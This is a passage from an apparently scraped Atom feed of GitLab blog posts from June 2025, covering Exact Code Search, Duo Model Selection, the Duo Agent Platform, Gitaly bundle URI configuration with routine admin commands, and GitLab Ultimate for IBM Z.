</tr>
<tr>
<td><code>sym:process</code></td>
<td>Finds &quot;process&quot; in symbols (methods, classes, variables)</td>
</tr>
</tbody>
</table>
<blockquote>
<p><strong>Pro Tip:</strong> For the most efficient searches, start specific and then broaden if needed. Using <code>file:</code> and <code>lang:</code> filters dramatically increases relevance.</p>
</blockquote>
<h3>Advanced search techniques</h3>
<p>Stack multiple filters for precision:</p>
<pre><code>is_expected file:rb -file:spec
</code></pre>
<p>This finds &quot;is_expected&quot; in Ruby files that don't have &quot;spec&quot; in their name.</p>
<p>Use regular expressions for powerful patterns:</p>
<pre><code>token.*=.*[\&quot;']
</code></pre>
<p><a href="https://gitlab.com/search?search=token.*%3D.*%5B%5C%22'%5D&amp;nav_source=navbar&amp;project_id=46649240&amp;group_id=9970&amp;search_code=true&amp;repository_ref=main&amp;regex=true">Watch this search performed against the GitLab Zoekt repository.</a></p>
<p>The search helps find hardcoded passwords, which, if not found, can be a security issue.</p>
<p>For more detailed syntax information, check the <a href="https://docs.gitlab.com/user/search/exact_code_search/#syntax">Exact Code Search documentation</a>.</p>
<h2>Availability and deployment</h2>
<h3>Current availability</h3>
<p>Exact Code Search is currently in Beta for GitLab.com users with Premium and Ultimate licenses:</p>
<ul>
<li>Available for over 99% of licensed groups</li>
<li>Search in the UI automatically uses Zoekt when available, Exact Code Search in Search API is behind a feature flag</li>
</ul>
<h3>Self-managed deployment options</h3>
<p>For self-managed instances, we offer several deployment methods:</p>
<ul>
<li>Kubernetes/Helm: Our most well-supported method, using our <a href="https://gitlab.com/gitlab-org/cloud-native/charts/gitlab-zoekt"><code>gitlab-zoekt</code> Helm chart</a></li>
<li>Other deployment options: We're working on streamlining deployment for Omnibus and other installation methods</li>
</ul>
<p>System requirements depend on your codebase size, but the architecture is designed to scale horizontally and/or vertically as your needs grow.</p>
<h2>What's coming next</h2>
<p>While Exact Code Search is already powerful, we're continuously improving it:</p>
<ul>
<li><strong>Scale optimizations</strong> to support instances with hundreds of thousands of repositories</li>
<li><strong>Improved self-managed deployment</strong> options, including streamlined Omnibus support</li>
<li><strong>Full high availability support</strong> with automatic failover and load balancing</li>
</ul>
<p>Stay tuned for updates as we move from Beta to General Availability.</p>
<h2>Transform how you work with code</h2>
<p>GitLab's Exact Code Search represents a fundamental rethinking of code discovery. By delivering exact matches, powerful regex support, and contextual results, it solves the most frustrating aspects of code search:</p>
<ul>
<li>No more wasting time with irrelevant results</li>
<li>No more missing important matches</li>
<li>No more clicking through files just to understand basic context</li>
<li>No more performance issues as codebases grow</li>
</ul>
<p>The impact extends beyond individual productivity:</p>
<ul>
<li><strong>Teams collaborate better</strong> with easy code referencing</li>
<li><strong>Knowledge sharing accelerates</strong> when patterns are discoverable</li>
<li><strong>Onboarding becomes faster</strong> with quick codebase comprehension</li>
<li><strong>Security improves</strong> with effective pattern auditing</li>
<li><strong>Technical debt reduction</strong> becomes more feasible</li>
</ul>
<p>Exact Code Search isn't just a feature, it's a better way to understand and work with code. Stop searching and start finding.</p>
<p><strong>We'd love to hear from you!</strong> Share your experiences, questions, or feedback about Exact Code Search in our <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/420920">feedback issue</a>. Your input helps us prioritize improvements and new features.</p>
<blockquote>
<h4>Ready to experience smarter code search? Learn more in our <a href="https://docs.gitlab.com/ee/user/search/exact_code_search.html">documentation</a> or try it now by performing a search in your Premium or Ultimate licensed namespaces or projects. Not a GitLab user yet? Try <a href="https://about.gitlab.com/free-trial/">a free, 60-day trial of GitLab Ultimate with Duo</a>!</h4>
</blockquote>
]]></content>
        <author>
            <name>Dmitry Gruzd</name>
            <uri>https://about.gitlab.com/blog/authors/dmitry-gruzd</uri>
        </author>
        <published>2025-06-25T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Speed meets governance: Model Selection comes to GitLab Duo]]></title>
        <id>https://about.gitlab.com/blog/speed-meets-governance-model-selection-comes-to-gitlab-duo/</id>
        <link href="https://about.gitlab.com/blog/speed-meets-governance-model-selection-comes-to-gitlab-duo/"/>
        <updated>2025-06-25T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>New AI models are released almost daily, each with unique capabilities, performance characteristics, and compliance implications. At GitLab, we're committed to delivering cutting-edge AI capabilities by <a href="https://about.gitlab.com/blog/developing-gitlab-duo-how-we-validate-and-test-ai-models-at-scale/">continuously integrating the latest and highest-performing models as they become available</a>. However, we know this fast pace can create complex challenges for enterprise organizations whose model usage is subject to strict governance, compliance, and security standards.</p>
<p>Meet <a href="https://docs.gitlab.com/user/gitlab_duo/model_selection/">GitLab Duo Model Selection</a>, a powerful new capability that gives teams control over the large language models (<a href="https://about.gitlab.com/blog/what-is-a-large-language-model-llm/">LLMs</a>) used in your organization. Available in private beta in the newly released <a href="https://about.gitlab.com/releases/2025/06/19/gitlab-18-1-released/">GitLab 18.1</a> to all GitLab.com customers using Duo Enterprise, Duo Model Selection makes it easier to maintain governance, compliance, and security standards while helping accelerate innovation with agentic and generative AI. With Duo Model Selection, organizations can adopt GitLab Duo faster by selecting models from their pre-approved vendor list, versus the GitLab default model.</p>
<h2>The benefits of GitLab Duo Model Selection</h2>
<p>Duo Model Selection gives GitLab.com namespace owners control over which AI models teams can use across different GitLab Duo features, though those without specialized requirements are recommended to use the GitLab default model. With Duo Model Selection, you can:</p>
<ul>
<li>
<p><strong>Configure models at the organization level:</strong> Set AI model preferences that apply across your organization’s entire namespace, ensuring consistent governance and compliance standards. Namespace owners can select models approved by their organization from GitLab's validated model catalog.</p>
</li>
<li>
<p><strong>Control models per GitLab Duo feature:</strong> Different GitLab Duo features can use different models based on your specific needs.</p>
</li>
</ul>
<p>Watch Duo Model Selection in action:</p>
<p>&lt;div style=&quot;padding:62.21% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1094452473?autoplay=1&quot;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;Duo Model Selection Demo&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>Join the Duo Model Selection private beta</h2>
<p>Ready to take control of your AI governance? Duo Model Selection is currently in private beta for all GitLab.com customers using Duo Enterprise. To join the private beta, reach out to your GitLab account team. If you don’t have Duo, <a href="https://about.gitlab.com/gitlab-duo/#free-trial">sign up for a GitLab Duo trial</a> today!</p>
<blockquote>
<p>Find out everything that's new and exciting, including agentic AI capabilities, in GitLab 18 with our <a href="https://about.gitlab.com/eighteen/">on-demand launch event</a>.</p>
</blockquote>
]]></content>
        <author>
            <name>Susie Bitters</name>
            <uri>https://about.gitlab.com/blog/authors/susie-bitters</uri>
        </author>
        <published>2025-06-25T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[GitLab Duo Agent Platform: What’s next for intelligent DevSecOps]]></title>
        <id>https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/</id>
        <link href="https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/"/>
        <updated>2025-06-24T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>I’m thrilled to introduce the next evolution of Duo Workflow: GitLab Duo Agent Platform. This innovative platform extends agentic capabilities across the software development lifecycle, enabling teams to work in parallel with multiple AI agents.</p>
<p>Imagine starting your day like this:</p>
<ul>
<li>You assign one AI agent to conduct deep research on an epic your team is working on, provide the latest updates on all contributions from the past week, and suggest a release post based on recent feature additions.</li>
<li>In parallel, you delegate a handful of accessibility bugs to several agents for analysis and to make the necessary code changes to resolve them.</li>
<li>Meanwhile, you ask another agent to review your complicated code changes and provide feedback before sending them to your teammate for formal review.</li>
<li>Finally, when the security team pings you about a new vulnerability that needs investigation across your entire project, you hand that research task to your security agent.</li>
</ul>
<p>All of this happens simultaneously, while you focus on architecture decisions, creative problem-solving, and strategic technical work. GitLab Duo Agent Platform will let you delegate tasks to five, 10, or even 100 specialized agents — all with full context of your project, not just your code, including CI job logs, planning work items, and so much more. You’re automating the tedious work you have to do, so you can focus on the work that inspires you.</p>
<p><strong>This isn't about replacing developers. It's about amplifying human creativity and expertise by removing the friction from routine tasks.</strong> That’s the future we’re building with GitLab Duo Agent Platform.</p>
<h2>What is GitLab Duo Agent Platform?</h2>
<p>GitLab Duo Agent Platform will enable many-to-many collaboration between engineers and <a href="https://about.gitlab.com/topics/agentic-ai/">AI agents</a> across the full software development lifecycle, designed to help teams dramatically improve productivity and cycle time.</p>
<p>Built on GitLab’s secure foundation, GitLab Duo Agent Platform is customizable and extendable. It empowers developers to build agents to tackle all kinds of software engineering problems, leveraging context across your entire software development lifecycle.</p>
<p>GitLab Duo Agent Platform will go beyond code creation with specialized agents and custom workflows that can help with a nearly unlimited list of activities, including:</p>
<ul>
<li>Issue implementation</li>
<li>Large-scale migrations/dependency upgrades</li>
<li>Automated documentation building/release posts</li>
<li>Fixing broken pipelines</li>
<li>Incident research support</li>
<li>Deep research of status and information on topics</li>
<li>Backlog administration</li>
<li>Vulnerability resolution</li>
<li>Reviews for specific types of code (e.g. database)</li>
<li>Quick internal tool building based on existing build blocks</li>
<li>and many more!</li>
</ul>
<p>You will be able to use our agents out of the box as well as customize and extend them. We’re currently beta testing GitLab Duo Agent Platform with dozens of customers and will open beta access to more teams soon.</p>
<p>Watch GitLab Duo Agent Platform in action:
&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1095679084?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;Agent Platform Demo Clip&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>Choose your tools, your models, and your agents</h2>
<p>Consistent with GitLab’s commitment to being an open platform, GitLab agents will seamlessly interoperate with your choice of code-authoring developer tools via standard model context protocol (MCP) and the agent-to-agent (A2A) framework, whether you’re using Cursor, Claude Code, Windsurf, OpenAI Codex, or others.</p>
<p>The platform will accept code contributions from any development tool in your stack, whether that code was written by a human developer or generated by an AI agent. This means your existing workflows and preferred tools will continue to work seamlessly as you integrate agent capabilities.</p>
<p>GitLab Duo Agent Platform will work with any approved language model that <a href="https://about.gitlab.com/ai-transparency-center/#ai-continuity-plan">meets our selection criteria</a>. For organizations with strict security requirements, it will support approved self-hosted models running in completely air-gapped environments. Your infrastructure requirements and security policies won’t limit your ability to benefit from agentic development.</p>
<h2>Context is everything, and your GitLab Duo agents have it</h2>
<p>The difference between a helpful AI tool and a truly intelligent agent comes down to context. With GitLab Duo Agent Platform, agents don't work in isolation — they're deeply integrated into the platform where development work happens.</p>
<p>Every agent will automatically understand the full picture of your projects, including your open issues and their history, the merge requests that resolved them, the structure and rationale behind your code, your CI/CD pipeline configurations, security findings, compliance requirements, and the intricate relationships between all these components.</p>
<p>Just like your human team members, agents have all the context to help you ship secure software faster. Instead of just answering questions about code, they will be able to provide insights about how a proposed change might affect your deployment pipeline or suggest security improvements based on your existing compliance rules. We believe that the more your team works within GitLab’s DevSecOps platform, the smarter your agents will become.</p>
<h2>Stay in control while agents scale your team</h2>
<p>Building trust with AI agents isn't fundamentally different from building trust with new team members. You need to see their work, understand their approach, and gradually increase their responsibilities as they prove their competence.</p>
<p>That's the philosophy behind our agent approval workflow. Before any agent makes changes to your code or environment, it will present you with a clear plan: what it understands about the issue, the approach it will take, and the specific actions it wants to perform. You’ll then get the opportunity to review, approve, or redirect as needed. Over time, as agents consistently deliver quality work, you will be able to grant them greater autonomy for routine tasks while maintaining oversight for complex or critical work.</p>
<h2>Built for community and customization</h2>
<p>GitLab has always thrived on community contributions, and this year marked a milestone with record-breaking customer contributions to our platform. Now we're extending that same collaborative energy to AI agents through our open framework approach.</p>
<p>GitLab Duo Agent Platform isn't just about the agents we build — it's about empowering you and the broader community to create specialized agents that solve your unique engineering challenges. Whether you need an agent that understands your specific coding standards, integrates with your custom toolchain, or handles domain-specific tasks, the platform will give you the building blocks to make it happen.</p>
<p>This community-driven model creates a virtuous cycle that leverages the strength of the GitLab community through global sharing, similar to our <a href="https://about.gitlab.com/blog/ci-cd-catalog-goes-ga-no-more-building-pipelines-from-scratch/">CI/CD Catalog</a>. Diverse real-world use cases drive innovation. Enterprise feedback ensures reliability and security. And shared solutions benefit everyone. It's the same collaborative approach that has made GitLab successful, now applied to the frontier of agentic development.</p>
<h2>How to get started</h2>
<p>If you've been experimenting with <a href="https://about.gitlab.com/blog/gitlab-duo-chat-gets-agentic-ai-makeover/">GitLab Duo Agentic Chat</a>, now included with every GitLab 18 Premium and Ultimate GitLab.com user license, you've already gotten a taste of what's possible with AI agents in your development workflow.</p>
<p>To see what GitLab Duo Agent Platform can do and what we’re working on, check out the <a href="https://about.gitlab.com/eighteen/">demos in the recording of our annual GitLab 18 release event</a>.</p>
<p>Want to be among the first to experience it? Sign up for the GitLab <a href="https://about.gitlab.com/gitlab-duo/agent-platform/">Duo Agent Platform beta waitlist</a>. This summer, we'll be opening access to more teams, with new agent features coming out in GitLab 18's upcoming releases throughout the year. We expect general availability this winter.</p>
<p><em>Disclaimer: This presentation contains information related to upcoming products, features, and functionality. It is important to note that the information in this presentation is for informational purposes only. Please do not rely on this information for purchasing or planning purposes. As with all projects, the items mentioned in this presentation and linked pages are subject to change or delay. The development, release, and timing of any products, features, or functionality remain at the sole discretion of GitLab Inc.</em></p>
<h2>Learn more</h2>
<ul>
<li><a href="https://about.gitlab.com/the-source/ai/from-vibe-coding-to-agentic-ai-a-roadmap-for-technical-leaders/">From vibe coding to agentic AI: A roadmap for technical leaders</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/">What is agentic AI?</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/devops-automation-ai-agents/">DevOps automation and AI agents</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/ai-augmented-software-development/">AI-augmented software development: Agentic AI for DevOps</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/ai-code-analysis/">AI-driven code analysis: The new frontier in code security</a></li>
</ul>
]]></content>
        <author>
            <name>Bill Staples</name>
            <uri>https://about.gitlab.com/blog/authors/bill-staples</uri>
        </author>
        <published>2025-06-24T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Reduce the load on GitLab Gitaly with bundle URI]]></title>
        <id>https://about.gitlab.com/blog/reduce-the-load-on-gitlab-gitaly-with-bundle-uri/</id>
        <link href="https://about.gitlab.com/blog/reduce-the-load-on-gitlab-gitaly-with-bundle-uri/"/>
        <updated>2025-06-24T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Gitaly plays a vital role in the GitLab ecosystem — it is the server
component that handles all Git operations. Every push and pull made to/from
a repository is handled by Gitaly, which has direct access to the disk where
the actual repositories are stored. As a result, when Gitaly is under heavy
load, some operations like CI/CD pipelines and browsing a repository in the
GitLab UI can become quite slow. This is particularly true when serving
clones and fetches for large and busy monorepos, which can consume large
amounts of CPU and memory.</p>
<p><a href="https://docs.gitlab.com/administration/gitaly/bundle_uris/">Bundle URI</a> takes significant load off of Gitaly servers during clones by allowing Git to pre-download a bundled repository from object storage before calling the Gitaly servers to fetch the remaining objects.</p>
<p>Here is a graph that shows the difference between clones without and with bundle URI.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1750705069/rvbm4ru1w58msd6zv4x7.png" alt="Graph that shows the difference between clones without and with bundle URI"></p>
<p>This graph shows the results of a small test we ran on an isolated GitLab installation, with Gitaly running on a machine with 2 CPUs. We wanted to test bundle URI with a large repository, so we pushed the <a href="https://gitlab.com/gitlab-org/gitlab">GitLab repository</a> to the instance. We also generated a bundle beforehand.</p>
<p>The big CPU spike is from when we performed a single clone of the GitLab repository with bundle URI disabled. It's quite noticeable. A little later, we turned on bundle URI and launched three concurrent clones of the GitLab repository. Sure enough, turning on bundle URI provides massive performance gain. We can't even distinguish the CPU usage of the three clones from normal usage.</p>
<h2>Configure Gitaly to use bundle URI</h2>
<p>To enable bundle URI on your GitLab installation, there are a couple of things you need to configure.</p>
<h3>Create a cloud bucket</h3>
<p>Bundles need to be stored somewhere. The ideal place is in a cloud storage bucket. Gitaly uses the <a href="https://pkg.go.dev/gocloud.dev">gocloud.dev</a> library to read and write from cloud storage. Any cloud storage solution supported by this library can be used. Once you have a cloud bucket URL, you can add it in the Gitaly configuration here:</p>
<pre><code class="language-toml">[bundle_uri]
go_cloud_url = &quot;&lt;bucket-uri&gt;&quot;
</code></pre>
<p>It must be noted that Gitaly does not manage the lifecycle of the bundles stored in the bucket. To avoid cost issues, object lifecycle policies must be enabled on the bucket in order to delete unused or old objects.</p>
<h3>Enable the feature flags</h3>
<p>There are two feature flags to enable:</p>
<ul>
<li>
<p><code>gitaly_bundle_generation</code> enables <a href="#auto-generated">auto-generation</a> of bundles.</p>
</li>
<li>
<p><code>gitaly_bundle_uri</code> makes Gitaly advertise bundle URIs when they are available (either manually created or auto-generated) and allows the user to <a href="#manual">manually</a> generate bundles.</p>
</li>
</ul>
<p>These feature flags can be enabled at-large on a GitLab installation, or per repository. See the <a href="https://docs.gitlab.com/administration/feature_flags/#how-to-enable-and-disable-features-behind-flags">documentation on how to enable a GitLab feature behind a feature flag</a>.</p>
<h3>How to generate bundles</h3>
<p>Gitaly offers two ways for users to use bundle URI: a <a href="#manual">manual</a> way and an <a href="#auto-generated">auto-generated</a> way.</p>
<h4>Manual</h4>
<p>It is possible to create a bundle manually by connecting over SSH with the Gitaly node that stores the repository you want to create a bundle for, and run the following command:</p>
<pre><code class="language-shell">sudo -u git -- /opt/gitlab/embedded/bin/gitaly bundle-uri 
--config=&lt;config-file&gt;
--storage=&lt;storage-name&gt;
--repository=&lt;relative-path&gt;
</code></pre>
<p>This command will create a bundle for the given repository and store it into the bucket configured above. When a subsequent <code>git clone</code> request will reach Gitaly for the same repository, the bundle URI mechanism described above will come into play.</p>
<h4>Auto-generated</h4>
<p>Gitaly can also generate bundles automatically, using a heuristic to determine if it is currently handling frequent clones for the same repository.</p>
<p>The current heuristic keeps track of the number of times a <code>git fetch</code> request is issued for each repository. If the number of requests reaches a certain <code>threshold</code> in a given time <code>interval</code>, a bundle is automatically generated. Gitaly also keeps track of the last time it generated a bundle for a repository. When a new bundle should be regenerated, based on the <code>threshold</code> and <code>interval</code>, Gitaly looks at the last time a bundle was generated for the given repository. It will only generate a new bundle if the existing bundle is older than some <code>maxBundleAge</code> configuration. The old bundle is overwritten. There can only be one bundle per repository in cloud storage.</p>
<h2>Using bundle URI</h2>
<p>When a bundle exists for a repository, it can be used by the <code>git clone</code> command.</p>
<h3>Cloning from your terminal</h3>
<p>To clone a repository from your terminal, make sure your Git configuration enables bundle URI. The configuration can be set like so:</p>
<pre><code class="language-shell">git config --global transfer.bundleuri true
</code></pre>
<p>To verify that bundle URI is used during a clone, you can run the <code>git clone</code> command with <code>GIT_TRACE=1</code> and see if your bundle is being downloaded:</p>
<pre><code class="language-shell">➜  GIT_TRACE=1 git clone https://gitlab.com/gitlab-org/gitaly
...
14:31:42.374912 run-command.c:667       trace: run_command: git-remote-https '&lt;bundle-uri&gt;'
...
</code></pre>
<h3>Cloning during CI/CD pipelines</h3>
<p>One scenario where using bundle URI would be beneficial is during a CI/CD pipeline, where each job needs a copy of the repository in order to run. Cloning a repository during a CI/CD pipeline is the same as cloning a repository from your terminal, except that the Git client in this case is the GitLab Runner. Thus, we need to configure the GitLab Runner in such a way that it can use bundle URI.</p>
<p><strong>1. Update the helper-image</strong></p>
<p>The first thing to do to configure the GitLab Runner is to <a href="https://docs.gitlab.com/runner/configuration/advanced-configuration/#override-the-helper-image">overwrite the helper-image</a> that your GitLab Runner instances use. The <code>helper-image</code> is the image that is used to run the process of cloning a repository before the job starts. To use bundle URI, the image needs the following:</p>
<ul>
<li>
<p>Git Version 2.49.0 or later</p>
</li>
<li>
<p><a href="https://gitlab.com/gitlab-org/gitlab-runner/-/tree/main/apps/gitlab-runner-helper?ref_type=heads"><code>GitLab Runner helper</code></a> Version 18.1.0 or later</p>
</li>
</ul>
<p>The helper-images can be found <a href="https://gitlab.com/gitlab-org/gitlab-runner/container_registry/1472754?orderBy=PUBLISHED_AT&amp;sort=desc&amp;search%5B%5D=v18.1.0">here</a>. Select an image that corresponds to the OS distribution and the architecture you use for your GitLab Runner instances, and verify that the image satisfies the requirements.</p>
<p>At the time of writing, the <code>alpine-edge-&lt;arch&gt;-v18.1.0*</code> tag meets all requirements.</p>
<p>You can validate the image meets all requirements with:</p>
<pre><code class="language-shell">docker run -it &lt;image:tag&gt;
$ git version ## must be 2.49.0 or newer
$ gitlab-runner-helper -v ## must be 18.0 or newer
</code></pre>
<p>If you do not find an image that meets the requirements, you can also use the helper-image as a base image and install the requirements yourself in a custom-built image that you can host on <a href="https://docs.gitlab.com/user/packages/container_registry/">GitLab Container Registry</a>.</p>
<p>Once you have found the image you need, you must configure your GitLab Runner instances to use it by updating your <code>config.toml</code> file:</p>
<pre><code class="language-toml">[[runners]]
 (...)
 executor = &quot;docker&quot;
 [runners.docker]
    (...)
    helper_image = &quot;image:tag&quot; ## &lt;-- put the image name and tag here
</code></pre>
<p>Once the configuration is changed, you must restart the runners for the new configuration to take effect.</p>
<p><strong>2. Turn on the feature flag</strong></p>
<p>Next, you must enable the <code>FF_USE_GIT_NATIVE_CLONE</code> <a href="https://docs.gitlab.com/runner/configuration/feature-flags/">GitLab Runner feature flags</a> in your <code>.gitlab-ci.yml</code> file. To do that, simply add it as a variable and set to <code>true</code> :</p>
<pre><code class="language-yaml">variables:
  FF_USE_GIT_NATIVE_CLONE: &quot;true&quot;
</code></pre>
<p>The <code>GIT_STRATEGY</code> must also be <a href="https://docs.gitlab.com/ci/runners/configure_runners/#git-strategy">set to <code>clone</code></a>, as Git bundle URI only works with <code>clone</code> commands.</p>
<h2>How bundle URI works</h2>
<p>When a user clones a repository with the <code>git clone</code> command, a process called <a href="https://git-scm.com/docs/git-receive-pack"><code>git-receive-pack</code></a> is launched on the client's machine. This process communicates with the remote repository's server (it can be over HTTP/S, SSH, etc.) and asks to start a <a href="https://git-scm.com/docs/git-receive-pack"><code>git-upload-pack</code></a> process. Those two processes then exchange information using the Git protocol (it must be noted that bundle URI is only supported with <a href="https://git-scm.com/docs/protocol-v2">Git protocol v2</a>). The capabilities both processes support and the references and objects the client needs are among the information exchanged. Once the Git server has determined which objects to send to the client, it must package them into a packfile, which, depending on the size of the data it must process, can consume a good amount of resources.</p>
<p>Where does bundle URI fit into this interaction? If bundle URI is advertised as a capability from the <code>upload-pack</code> process and the client supports bundle URI, the Git client will ask the server if it knows about any bundle URIs. The server sends those URIs back and the client downloads those bundles.</p>
<p>Here is a diagram that shows those interactions:</p>
<pre><code class="language-mermaid">
sequenceDiagram


    participant receive as Client


    participant upload as Server


    participant cloud as File server


    receive -&gt;&gt; upload: issue git-upload-pack


    upload --&gt;&gt; receive: list of server capabilities


    opt if bundle URI is advertised as a capability


    receive -&gt;&gt; upload: request bundle URI


    upload --&gt;&gt; receive: bundle URI


    receive -&gt;&gt; cloud: download bundle at URI


    cloud --&gt;&gt; receive: bundle file


    receive -&gt;&gt; receive: clone from bundle


    end


    receive -&gt;&gt; upload: requests missing references and objects


    upload --&gt;&gt; receive: packfile data

</code></pre>
<p>As such, Git <a href="https://git-scm.com/docs/bundle-uri">bundle URI</a> is a mechanism by which, during a <code>git clone</code>, a Git server can advertise the URI of a bundle for the repository being cloned by the Git client. When that is the case, the Git client can clone the repository from the bundle and request from the Git server only the missing references or objects that were not part of the bundle. This mechanism really helps to alleviate pressure from the Git server.</p>
<h2>Alternatives</h2>
<p>GitLab also has a feature <a href="https://docs.gitlab.com/administration/gitaly/configure_gitaly/#pack-objects-cache">Pack-objects cache</a>. This feature works slightly differently than bundle URI. When the server packs objects together into a so-called packfile, this feature will keep that file in the cache. When another client needs the same set of objects, it doesn't need to repack them, but it can just send the same packfile again.</p>
<p>The feature is only beneficial when many clients request the exact same set of objects. In a repository that is quick-changing, this feature might not give any improvements. With bundle URI, it doesn't matter if the bundle is slightly out-of-date because the client can request missing objects after downloading the bundle and apply those changes on top. Also bundle URI in Gitaly stores the bundles on external storage, which the Pack-objects Cache stores them on the Gitaly node, so using the latter doesn't reduce network and I/O load on the Gitaly server.</p>
<h2>Try bundle URI today</h2>
<p>You can try the bundle URI feature in one of the following ways:</p>
<ul>
<li>
<p>Download a <a href="https://about.gitlab.com/free-trial/">free, 60-day trial version of GitLab Ultimate</a>.</p>
</li>
<li>
<p>If you already run a self-hosted GitLab installation, upgrade to 18.1.</p>
</li>
<li>
<p>If you can't upgrade to 18.1 at this time, <a href="https://about.gitlab.com/install/">download GitLab</a> to a local machine.</p>
</li>
</ul>
]]></content>
        <author>
            <name>Olivier Campeau</name>
            <uri>https://about.gitlab.com/blog/authors/olivier-campeau</uri>
        </author>
        <published>2025-06-24T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[GitLab Ultimate for IBM Z: Modern DevSecOps for mainframes]]></title>
        <id>https://about.gitlab.com/blog/gitlab-ultimate-for-ibm-z-modern-devsecops-for-mainframes/</id>
        <link href="https://about.gitlab.com/blog/gitlab-ultimate-for-ibm-z-modern-devsecops-for-mainframes/"/>
        <updated>2025-06-23T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>GitLab and IBM have partnered to solve a fundamental disconnect in enterprise development: enabling mainframe developers to work with the same modern tools, workflows, and collaboration features as their distributed counterparts. GitLab Ultimate for IBM Z, a GitLab-certified, integrated DevSecOps solution tailored for the mainframe environment, does just that — allowing organizations to modernize their mainframe development workflows by facilitating a seamless migration from outdated legacy library managers. With CI/CD pipelines running natively on IBM z/OS, customers experience accelerated innovation and reduced operational costs.</p>
<h2>Challenges of today's mainframe development</h2>
<p>Enterprise organizations that use IBM Z systems for mission-critical workloads face challenges that conventional DevSecOps tools aren’t equipped to address. Cloud-native teams benefit from modern <a href="https://about.gitlab.com/topics/ci-cd/">CI/CD</a> pipelines, collaborative development, and automated testing. In contrast, mainframe teams are often left behind — stuck with outdated tools that lead to costly inefficiencies and operational silos.</p>
<p>Teams often resort to workarounds, such as SSH connections and manual file transfers, which create security vulnerabilities and audit difficulties. When compliance requirements are stringent, these improvised solutions become unacceptable risks. Meanwhile, organizations maintain expensive parallel toolchains, with legacy mainframe development tools carrying premium licensing costs while delivering limited functionality compared to modern alternatives.</p>
<p>This fragmentation creates two problems: slower delivery cycles and difficulty attracting developers who expect modern development experiences.</p>
<blockquote>
<p><strong>&quot;GitLab Ultimate for IBM Z represents an important step in addressing a long-standing industry challenge. IDC research shows that mainframe developers often work with legacy tooling that contributes to delivery inefficiencies and makes it harder to attract new talent. With this offering, modern DevSecOps capabilities and unified workflows are brought directly to the mainframe. This empowers developers to work more collaboratively and efficiently, while helping organizations accelerate innovation and integrate mainframe development into broader digital transformation strategies.&quot;</strong> - Katie Norton, Research Manager, DevSecOps and Software Supply Chain Security at IDC</p>
</blockquote>
<h2>Unified development environments</h2>
<p>True modernization means more than just updating mainframe development. It means creating a unified platform where mainframe, cloud-native, web, and mobile development teams collaborate seamlessly.</p>
<p>GitLab Ultimate for IBM Z enables developers to use consistent workflows whether they're deploying to z/OS, cloud, or on-premises infrastructure — knowledge transfers between teams instead of staying siloed. Organizations can modernize incrementally without business disruption, as legacy systems continue operating while teams adopt modern practices at their own pace.</p>
<p>As organizations pursue hybrid cloud strategies, GitLab provides the foundation for applications that span mainframe and cloud-native environments.</p>
<h2>What is GitLab Ultimate for IBM Z?</h2>
<p>GitLab Ultimate for IBM Z delivers native z/OS Runner support, enabling seamless CI/CD pipeline execution directly on your mainframe infrastructure. This GitLab-certified solution helps eliminate the need for complex workarounds while maintaining the security and reliability your enterprise applications demand.</p>
<p>The combination of GitLab's comprehensive DevSecOps platform with IBM's deep mainframe expertise creates something unique in the market: a certified solution that provides a true bridge between enterprise legacy systems and cloud-native innovation.</p>
<h2>GitLab Ultimate for IBM Z capabilities</h2>
<p>GitLab Ultimate for IBM Z provides enterprise teams with the tools they need to modernize mainframe development while preserving critical business systems.</p>
<p><strong>Native z/OS Runner support</strong> helps eliminate security risks and scalability bottlenecks associated with remote connections, while accelerating delivery through CI/CD pipelines that execute directly where your mainframe code resides.</p>
<p><strong>Unified Source Code Management</strong> modernizes your toolchain by replacing expensive legacy library managers with GitLab's searchable, version-controlled repository system, helping reduce licensing costs and maintenance overhead.</p>
<p><strong>Seamless integration</strong> with IBM Developer for z/OS Enterprise Edition (IDzEE) delivers faster software releases through dependency-based builds, automated code scanning, and comprehensive debugging tools within familiar developer environments, enhancing both quality and security.</p>
<p><strong>End-to-end visibility</strong> across mainframe and distributed environments provides comprehensive project management from planning to production, enabling automated DevOps workflows that help retain talent through modern, next-generation development tools.</p>
<h2>Modernize your mainframe development environment today</h2>
<p>GitLab Ultimate for IBM Z is available now for organizations ready to transform their mainframe development experience. To learn more, visit the <a href="https://about.gitlab.com/partners/technology-partners/ibm/">GitLab and IBM partnership page</a>.</p>
]]></content>
        <author>
            <name>Mike Flouton</name>
            <uri>https://about.gitlab.com/blog/authors/mike-flouton</uri>
        </author>
        <author>
            <name>Andy Bradfield</name>
